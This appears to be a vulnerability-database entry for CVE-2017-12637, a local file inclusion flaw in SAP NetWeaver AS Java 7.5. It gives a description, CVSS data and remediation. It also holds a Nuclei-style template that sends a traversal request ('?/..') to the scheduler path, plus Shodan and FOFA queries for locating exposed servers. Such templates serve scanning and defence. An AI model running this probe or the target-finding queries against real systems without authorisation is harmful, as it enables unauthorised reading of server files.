CVE-2017-12637: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion

日期: 2025-08-01 | 影响软件: SAP NetWeaver Application Server Java | POC: 已公开

漏洞描述

SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.

PoC代码[已公开]

id: CVE-2017-12637

info:
  name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
  author: apt-mirror
  severity: high
  description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.
  remediation: |
    Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
  reference:
    - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
    - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
    - http://www.sh0w.top/index.php/archives/7/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-12637
    cwe-id: CWE-22
    epss-score: 0.93491
    epss-percentile: 0.99821
    cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: netweaver_application_server_java
    shodan-query: http.favicon.hash:-266008933
    fofa-query: icon_hash=-266008933
  tags: cve2017,cve,sap,lfi,java,traversal,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "WEB-INF"
          - "META-INF"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200aa24c494fafc1106b98b7bbdb4525ba7530d96ed5dd696a7652c934c310b8e802206f692214842129e06585a5fe3044a266761bac159069d7169cc6cca0d70bc59a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐